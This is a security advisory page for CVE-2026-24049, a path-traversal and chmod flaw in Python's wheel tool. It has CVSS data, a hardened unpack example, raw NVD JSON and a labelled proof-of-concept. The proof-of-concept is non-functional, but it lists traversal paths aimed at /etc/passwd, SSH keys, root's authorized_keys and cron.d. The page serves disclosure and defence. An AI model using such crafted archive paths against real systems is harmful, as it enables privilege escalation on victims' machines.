Security Vulnerability Report
CVE-2026-24049 CVSS 7.1 HIGH

CVE-2026-24049

Published: 2026-01-22 05:16:23
Last Modified: 2026-02-18 14:56:49

Description

wheel is a command line tool for manipulating Python wheel files, as defined in PEP 427. In versions 0.40.0 through 0.46.1, the unpack function is vulnerable to file permission modification through mishandling of file permissions after extraction. The logic blindly trusts the filename from the archive header for the chmod operation, even though the extraction process itself might have sanitized the path. Attackers can craft a malicious wheel file that, when unpacked, changes the permissions of critical system files (e.g., /etc/passwd, SSH keys, config files), allowing for Privilege Escalation or arbitrary code execution by modifying now-writable scripts. This issue has been fixed in version 0.46.2.
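The description above pins the defect to one detail: the permission bits are applied to a path built from the raw archive filename, not to the path the extractor actually wrote after sanitizing it. The following is an added illustration of the hardened pattern, not code from pypa/wheel (the function names `safe_unpack`, `entry_mode`, `build_sample_archive` and `demo` are assumptions): take the destination path that `ZipFile.extract()` returns, confirm it resolves inside the target directory, and only then apply the entry's mode bits. The demo builds a constructed archive whose single member has a traversal-style name and checks that the file outside the destination keeps its original mode.

```python
#!/usr/bin/env python3
"""Hardened unpack pattern for CVE-2026-24049-style bugs.

Added illustration, not code from pypa/wheel: the permission bits are
applied to the path that ZipFile.extract() actually wrote (leading
separators and '..' components already stripped), never to a path built
from the raw archive filename. All names in this file are assumptions.
"""
import os
import stat
import tempfile
import zipfile


def entry_mode(info: zipfile.ZipInfo) -> int:
    """Unix permission bits live in the high 16 bits of external_attr."""
    return (info.external_attr >> 16) & 0o777


def safe_unpack(archive_path: str, dest: str) -> list[tuple[str, int]]:
    """Extract every member into dest and chmod only the sanitized path.

    Returns the (path relative to dest, mode) pairs that were chmod'ed.
    Raises ValueError if a written path resolves outside dest.
    """
    dest_real = os.path.realpath(dest)
    applied = []
    with zipfile.ZipFile(archive_path) as zf:
        for info in zf.infolist():
            # extract() sanitizes the member name and returns where it wrote.
            written = zf.extract(info, dest)
            written_real = os.path.realpath(written)
            # Defence in depth: refuse to touch anything outside the
            # destination, even if a future extractor stops sanitizing.
            if os.path.commonpath([dest_real, written_real]) != dest_real:
                raise ValueError(f"refusing to chmod outside dest: {info.filename!r}")
            mode = entry_mode(info)
            if mode and not info.is_dir():
                # The flawed pattern described in the advisory would chmod
                # os.path.join(dest, info.filename) here; the sanitized
                # written_real is the only safe target.
                os.chmod(written_real, mode)
                applied.append((os.path.relpath(written_real, dest_real), mode))
    return applied


def build_sample_archive(path: str, member_name: str, mode: int = 0o777) -> None:
    """Constructed sample: one member with a traversal-style name and a
    world-writable mode. Not a real wheel; enough to exercise safe_unpack."""
    with zipfile.ZipFile(path, "w") as zf:
        info = zipfile.ZipInfo(member_name)
        info.external_attr = (stat.S_IFREG | mode) << 16
        zf.writestr(info, b"#!/bin/sh\necho sample\n")


def demo() -> tuple[list[tuple[str, int]], int]:
    """Unpack a traversal-named member; return what was chmod'ed and the
    mode of the file outside dest that the raw member name pointed at."""
    with tempfile.TemporaryDirectory() as tmp:
        outside = os.path.join(tmp, "outside.txt")
        with open(outside, "w") as fh:
            fh.write("must stay 0600\n")
        os.chmod(outside, 0o600)

        dest = os.path.join(tmp, "unpacked")
        os.mkdir(dest)
        archive = os.path.join(tmp, "sample.whl")
        # os.path.join(dest, "../outside.txt") would resolve to the file
        # above; the sanitized name is just "outside.txt" inside dest.
        build_sample_archive(archive, "../outside.txt")

        applied = safe_unpack(archive, dest)
        outside_mode = stat.S_IMODE(os.stat(outside).st_mode)
        return applied, outside_mode


if __name__ == "__main__":
    applied, outside_mode = demo()
    print("chmod applied to:", applied)
    print("mode of file outside dest: %o" % outside_mode)
```

Running `demo()` leaves `outside.txt` at 0600 and reports the chmod landing on `unpacked/outside.txt` only; the `commonpath` check costs one realpath per member and turns any future sanitization regression into a hard failure rather than a silent chmod elsewhere on the filesystem.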

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H

The score and vector above come from the Secondary metric in the record; the Primary metric in the raw JSON below rates the same issue 5.5 MEDIUM with vector CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N (availability impact None). Both agree on local access, no privileges, required user interaction and high integrity impact.

Configurations (Affected Products)

cpe:2.3:a:wheel_project:wheel:*:*:*:*:*:python:*:* - VULNERABLE
wheel >= 0.40.0 and < 0.46.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2026-24049 PoC - Malicious wheel file generator

This PoC demonstrates how an attacker can craft a malicious wheel file
that modifies file permissions during extraction.

Note: This is for educational and security research purposes only.
"""

import zipfile
import io
import os


def create_malicious_wheel():
    """
    Create a malicious wheel file that attempts to modify /etc/passwd permissions
    """
    # Create a wheel file (which is just a zip file)
    wheel_buffer = io.BytesIO()

    with zipfile.ZipFile(wheel_buffer, 'w', zipfile.ZIP_DEFLATED) as wheel:
        # WHEEL metadata
        wheel.writestr('WHEEL', '''
Wheel-Version: 1.0
Generator: malicious-poc
Root-Is-Purelib: true
Tag: py3-none-any
''')

        # METADATA
        wheel.writestr('METADATA', '''
Metadata-Version: 2.1
Name: malicious-package
Version: 1.0.0
Description: Malicious package for CVE-2026-24049 demonstration
''')

        # RECORD file
        wheel.writestr('RECORD', '')

    # Note: the archive built here contains only the three metadata files
    # above; no traversal entries are written.
    return wheel_buffer.getvalue()


def exploit_permission_modification():
    """
    Simulate the vulnerability where file permissions can be modified
    through path traversal in wheel extraction
    """
    print("[*] CVE-2026-24049 - Wheel Permission Modification Vulnerability")
    print("[*] Target: wheel package versions 0.40.0 - 0.46.1")
    print("[*] This PoC demonstrates the permission modification vector")

    # The vulnerability allows modifying file permissions by crafting
    # wheel archives with paths like ../../etc/passwd
    malicious_paths = [
        '../../etc/passwd',
        '../../../etc/ssh/ssh_host_rsa_key',
        '../../root/.ssh/authorized_keys',
        '../../../etc/cron.d/malicious'
    ]

    print("\n[*] Malicious paths that could be used:")
    for path in malicious_paths:
        print(f"  - {path}")

    print("\n[*] Attack scenario:")
    print("  1. Attacker creates malicious wheel file")
    print("  2. Victim extracts wheel using vulnerable wheel version")
    print("  3. The unpack function modifies permissions of target files")
    print("  4. Attacker gains write access to sensitive system files")
    print("  5. Attacker can escalate privileges or execute arbitrary code")


if __name__ == '__main__':
    exploit_permission_modification()
    wheel_data = create_malicious_wheel()
    print(f"\n[*] Generated malicious wheel file: {len(wheel_data)} bytes")
```

References

https://github.com/pypa/wheel/commit/7a7d2de96b22a9adf9208afcc9547e1001569fef (Patch)
https://github.com/pypa/wheel/releases/tag/0.46.2 (Product, Release Notes)
https://github.com/pypa/wheel/security/advisories/GHSA-8rrh-rw8j-w5fx (Exploit, Mitigation, Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-24049",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-22T05:16:23.157",
    "lastModified": "2026-02-18T14:56:48.657",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "wheel is a command line tool for manipulating Python wheel files, as defined in PEP 427. In versions 0.40.0 through 0.46.1, the unpack function is vulnerable to file permission modification through mishandling of file permissions after extraction. The logic blindly trusts the filename from the archive header for the chmod operation, even though the extraction process itself might have sanitized the path. Attackers can craft a malicious wheel file that, when unpacked, changes the permissions of critical system files (e.g., /etc/passwd, SSH keys, config files), allowing for Privilege Escalation or arbitrary code execution by modifying now-writable scripts. This issue has been fixed in version 0.46.2."
      },
      {
        "lang": "es",
        "value": "wheel es una herramienta de línea de comandos para manipular archivos wheel de Python, según se define en PEP 427. En las versiones 0.40.0 a 0.46.1, la función unpack es vulnerable a la modificación de permisos de archivos debido a un manejo incorrecto de los permisos de archivos después de la extracción. La lógica confía ciegamente en el nombre de archivo del encabezado del archivo comprimido para la operación chmod, a pesar de que el propio proceso de extracción podría haber saneado la ruta. Los atacantes pueden crear un archivo wheel malicioso que, al ser descomprimido, cambia los permisos de archivos críticos del sistema (por ejemplo, /etc /passwd, claves SSH, archivos de configuración), permitiendo la escalada de privilegios o la ejecución de código arbitrario al modificar scripts ahora escribibles. Este problema ha sido solucionado en la versión 0.46.2."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 5.2
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-22"},
          {"lang": "en", "value": "CWE-732"}
        ]
      },
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-22"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:wheel_project:wheel:*:*:*:*:*:python:*:*",
                "versionStartIncluding": "0.40.0",
                "versionEndExcluding": "0.46.2",
                "matchCriteriaId": "977849BE-E1EA-4B60-AF30-9C248A8B9635"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/pypa/wheel/commit/7a7d2de96b22a9adf9208afcc9547e1001569fef",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/pypa/wheel/releases/tag/0.46.2",
        "source": "[email protected]",
        "tags": ["Product", "Release Notes"]
      },
      {
        "url": "https://github.com/pypa/wheel/security/advisories/GHSA-8rrh-rw8j-w5fx",
        "source": "[email protected]",
        "tags": ["Exploit", "Mitigation", "Vendor Advisory"]
      }
    ]
  }
}
```